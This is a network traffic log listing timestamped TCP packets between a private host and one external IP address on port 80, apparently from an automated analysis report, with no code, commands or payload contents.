Dec 21, 2020 08:34:40.621320963 CET	80	49301	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:40.690089941 CET	80	49301	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:40.690187931 CET	49301	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:40.690287113 CET	49301	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:40.755889893 CET	80	49301	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:40.900079966 CET	49302	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:40.959024906 CET	80	49302	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:40.959212065 CET	49302	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:40.965176105 CET	49302	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:41.024213076 CET	80	49302	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:41.024310112 CET	49302	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:41.083123922 CET	80	49302	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:41.148494959 CET	80	49302	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:41.148582935 CET	49302	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:41.148627043 CET	49302	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:41.207613945 CET	80	49302	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:41.352255106 CET	49303	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:41.417655945 CET	80	49303	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:41.417766094 CET	49303	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:41.423696995 CET	49303	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:41.488809109 CET	80	49303	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:41.488898039 CET	49303	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:41.553966045 CET	80	49303	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:41.618469954 CET	80	49303	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:41.618592024 CET	49303	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:41.618659019 CET	49303	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:41.683809042 CET	80	49303	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:41.813842058 CET	49304	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:41.873466015 CET	80	49304	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:41.873584032 CET	49304	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:41.877856970 CET	49304	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:41.937319994 CET	80	49304	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:41.937447071 CET	49304	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:41.996802092 CET	80	49304	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:42.063981056 CET	80	49304	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:42.064074993 CET	49304	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:42.064121962 CET	49304	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:42.123233080 CET	80	49304	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:42.256848097 CET	49305	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:42.319845915 CET	80	49305	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:42.320022106 CET	49305	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:42.325851917 CET	49305	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:42.388859987 CET	80	49305	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:42.388955116 CET	49305	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:42.451891899 CET	80	49305	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:42.520302057 CET	80	49305	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:42.520432949 CET	49305	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:42.520517111 CET	49305	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:42.583431959 CET	80	49305	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:42.715501070 CET	49306	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:42.772033930 CET	80	49306	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:42.772157907 CET	49306	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:42.778146029 CET	49306	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:42.834644079 CET	80	49306	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:42.834728003 CET	49306	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:42.891364098 CET	80	49306	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:42.961060047 CET	80	49306	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:42.961172104 CET	49306	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:42.961215019 CET	49306	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:43.017734051 CET	80	49306	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:43.151262999 CET	49307	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:43.210186958 CET	80	49307	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:43.210300922 CET	49307	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:43.216171026 CET	49307	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:43.274880886 CET	80	49307	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:43.274961948 CET	49307	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:43.333663940 CET	80	49307	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:43.400024891 CET	80	49307	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:43.400134087 CET	49307	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:43.400219917 CET	49307	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:43.459016085 CET	80	49307	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:43.586992979 CET	49308	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:43.651808023 CET	80	49308	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:43.651982069 CET	49308	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:43.656409979 CET	49308	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:43.720930099 CET	80	49308	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:43.721173048 CET	49308	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:43.785490990 CET	80	49308	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:43.853421926 CET	80	49308	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:43.853602886 CET	49308	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:43.853660107 CET	49308	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:43.918081045 CET	80	49308	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:44.039041996 CET	49309	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:44.100281954 CET	80	49309	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:44.100384951 CET	49309	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:44.106561899 CET	49309	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:44.167860031 CET	80	49309	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:44.167958021 CET	49309	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:44.229296923 CET	80	49309	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:44.292244911 CET	80	49309	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:44.292334080 CET	49309	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:44.292356014 CET	49309	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:44.353615046 CET	80	49309	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:44.475486994 CET	49310	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:44.541507006 CET	80	49310	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:44.541601896 CET	49310	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:44.544425964 CET	49310	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:44.610451937 CET	80	49310	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:44.610625029 CET	49310	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:44.677174091 CET	80	49310	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:44.748707056 CET	80	49310	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:44.748835087 CET	49310	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:44.748872042 CET	49310	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:44.814784050 CET	80	49310	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:44.955568075 CET	49311	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:45.022856951 CET	80	49311	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:45.022985935 CET	49311	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:45.030307055 CET	49311	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:45.098020077 CET	80	49311	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:45.098089933 CET	49311	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:45.165316105 CET	80	49311	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:45.235507965 CET	80	49311	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:45.235619068 CET	49311	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:45.235650063 CET	49311	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:45.303134918 CET	80	49311	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:45.431104898 CET	49312	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:45.490859032 CET	80	49312	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:45.490930080 CET	49312	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:45.493159056 CET	49312	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:45.552190065 CET	80	49312	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:45.552362919 CET	49312	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:45.611521006 CET	80	49312	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:45.681647062 CET	80	49312	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:45.681762934 CET	49312	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:45.681828022 CET	49312	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:45.741048098 CET	80	49312	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:45.902371883 CET	49313	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:45.960874081 CET	80	49313	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:45.960997105 CET	49313	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:45.965225935 CET	49313	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:46.023479939 CET	80	49313	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:46.023639917 CET	49313	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:46.082146883 CET	80	49313	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:46.144673109 CET	80	49313	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:46.144869089 CET	49313	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:46.144921064 CET	49313	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:46.203236103 CET	80	49313	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:46.321763992 CET	49314	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:46.379287004 CET	80	49314	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:46.379412889 CET	49314	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:46.385293007 CET	49314	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:46.443028927 CET	80	49314	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:46.443125963 CET	49314	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:46.500674963 CET	80	49314	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:46.572973013 CET	80	49314	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:46.573096037 CET	49314	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:46.573374987 CET	49314	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:46.630770922 CET	80	49314	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:46.763981104 CET	49315	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:46.826026917 CET	80	49315	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:46.826147079 CET	49315	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:46.831907988 CET	49315	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:46.894181013 CET	80	49315	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:46.894309998 CET	49315	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:46.956176043 CET	80	49315	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:47.024399042 CET	80	49315	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:47.024512053 CET	49315	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:47.024550915 CET	49315	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:47.086710930 CET	80	49315	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:47.217179060 CET	49316	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:47.275928974 CET	80	49316	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:47.276010036 CET	49316	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:47.278367996 CET	49316	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:47.337342024 CET	80	49316	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:47.337496996 CET	49316	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:47.396214962 CET	80	49316	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:47.471688032 CET	80	49316	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:47.471808910 CET	49316	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:47.471846104 CET	49316	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:47.530925035 CET	80	49316	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:49.680130959 CET	49317	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:49.742381096 CET	80	49317	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:49.742561102 CET	49317	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:49.748142004 CET	49317	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:49.810743093 CET	80	49317	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:49.810914040 CET	49317	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:49.869802952 CET	80	49317	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:49.936609030 CET	80	49317	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:49.936852932 CET	49317	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:49.936917067 CET	49317	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:49.995718956 CET	80	49317	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:50.127038956 CET	49318	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:50.187592983 CET	80	49318	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:50.187689066 CET	49318	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:50.191618919 CET	49318	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:50.251946926 CET	80	49318	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:50.252062082 CET	49318	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:50.312372923 CET	80	49318	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:50.381011963 CET	80	49318	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:50.381127119 CET	49318	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:50.381195068 CET	49318	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:50.441450119 CET	80	49318	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:50.581584930 CET	49319	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:50.641516924 CET	80	49319	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:50.641642094 CET	49319	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:50.644380093 CET	49319	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:50.704365015 CET	80	49319	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:50.704500914 CET	49319	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:50.764679909 CET	80	49319	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:50.836067915 CET	80	49319	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:50.836270094 CET	49319	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:50.836325884 CET	49319	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:50.896239996 CET	80	49319	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:51.029803991 CET	49320	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:51.088988066 CET	80	49320	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:51.089158058 CET	49320	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:51.092144966 CET	49320	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:51.150962114 CET	80	49320	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:51.151017904 CET	49320	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:51.209757090 CET	80	49320	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:51.279040098 CET	80	49320	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:51.281872988 CET	49320	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:51.308607101 CET	49320	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:51.367613077 CET	80	49320	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:51.578264952 CET	49321	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:51.636552095 CET	80	49321	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:51.636679888 CET	49321	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:51.642591953 CET	49321	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:51.700910091 CET	80	49321	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:51.701009035 CET	49321	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:51.759322882 CET	80	49321	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:51.822869062 CET	80	49321	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:51.824875116 CET	49321	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:51.827380896 CET	49321	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:51.886050940 CET	80	49321	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:52.008204937 CET	49322	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:52.069809914 CET	80	49322	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:52.069999933 CET	49322	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:52.076004028 CET	49322	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:52.137686968 CET	80	49322	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:52.138071060 CET	49322	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:52.199693918 CET	80	49322	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:52.725965977 CET	80	49322	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:52.726599932 CET	49322	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:52.726641893 CET	49322	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:52.787899017 CET	80	49322	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:53.262896061 CET	49323	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:53.322268963 CET	80	49323	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:53.322473049 CET	49323	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:53.324671030 CET	49323	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:53.384315968 CET	80	49323	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:53.384491920 CET	49323	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:53.443949938 CET	80	49323	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:53.510987043 CET	80	49323	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:53.511209011 CET	49323	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:53.511269093 CET	49323	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:53.570636034 CET	80	49323	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:53.701165915 CET	49324	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:53.764744997 CET	80	49324	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:53.764945030 CET	49324	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:53.771213055 CET	49324	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:53.834642887 CET	80	49324	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:53.834805965 CET	49324	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:53.897697926 CET	80	49324	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:53.966468096 CET	80	49324	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:53.966581106 CET	49324	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:53.966619015 CET	49324	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:54.029639959 CET	80	49324	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:54.154485941 CET	49325	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:54.219563007 CET	80	49325	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:54.219688892 CET	49325	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:54.225842953 CET	49325	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:54.290822983 CET	80	49325	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:54.290925980 CET	49325	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:54.355829954 CET	80	49325	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:54.429843903 CET	80	49325	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:54.430114985 CET	49325	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:54.430185080 CET	49325	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:54.495959044 CET	80	49325	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:54.629807949 CET	49326	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:54.691669941 CET	80	49326	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:54.691802025 CET	49326	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:54.695089102 CET	49326	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:54.756964922 CET	80	49326	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:54.757035971 CET	49326	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:54.818784952 CET	80	49326	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:54.893502951 CET	80	49326	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:54.893582106 CET	49326	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:54.893615961 CET	49326	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:54.955389977 CET	80	49326	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:55.099996090 CET	49327	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:55.164982080 CET	80	49327	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:55.165056944 CET	49327	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:55.167332888 CET	49327	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:55.232266903 CET	80	49327	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:55.232393026 CET	49327	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:55.297262907 CET	80	49327	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:55.360511065 CET	80	49327	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:55.360580921 CET	49327	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:55.360613108 CET	49327	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:55.425362110 CET	80	49327	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:55.558542967 CET	49328	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:55.618865967 CET	80	49328	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:55.618946075 CET	49328	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:55.621685982 CET	49328	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:55.680207968 CET	80	49328	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:55.680283070 CET	49328	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:55.738850117 CET	80	49328	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:55.806792974 CET	80	49328	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:55.806946993 CET	49328	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:55.807032108 CET	49328	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:55.865569115 CET	80	49328	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:56.017843962 CET	49329	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:56.076858044 CET	80	49329	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:56.076944113 CET	49329	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:56.079165936 CET	49329	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:56.137840986 CET	80	49329	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:56.137954950 CET	49329	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:56.196930885 CET	80	49329	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:56.264152050 CET	80	49329	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:56.264300108 CET	49329	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:56.264362097 CET	49329	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:56.322962999 CET	80	49329	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:56.458132982 CET	49330	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:56.517344952 CET	80	49330	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:56.517489910 CET	49330	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:56.523449898 CET	49330	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:56.582740068 CET	80	49330	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:56.582859039 CET	49330	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:56.642335892 CET	80	49330	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:56.707082033 CET	80	49330	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:56.707277060 CET	49330	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:56.708523989 CET	49330	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:56.767715931 CET	80	49330	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:56.923505068 CET	49331	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:56.982856035 CET	80	49331	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:56.982997894 CET	49331	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:56.986700058 CET	49331	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:57.045922041 CET	80	49331	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:57.046041965 CET	49331	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:57.105361938 CET	80	49331	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:57.170484066 CET	80	49331	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:57.170658112 CET	49331	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:57.170690060 CET	49331	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:57.230056047 CET	80	49331	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:57.371925116 CET	49332	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:57.437587976 CET	80	49332	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:57.437760115 CET	49332	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:57.440232992 CET	49332	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:57.505733967 CET	80	49332	185.193.143.118	192.168.2.22
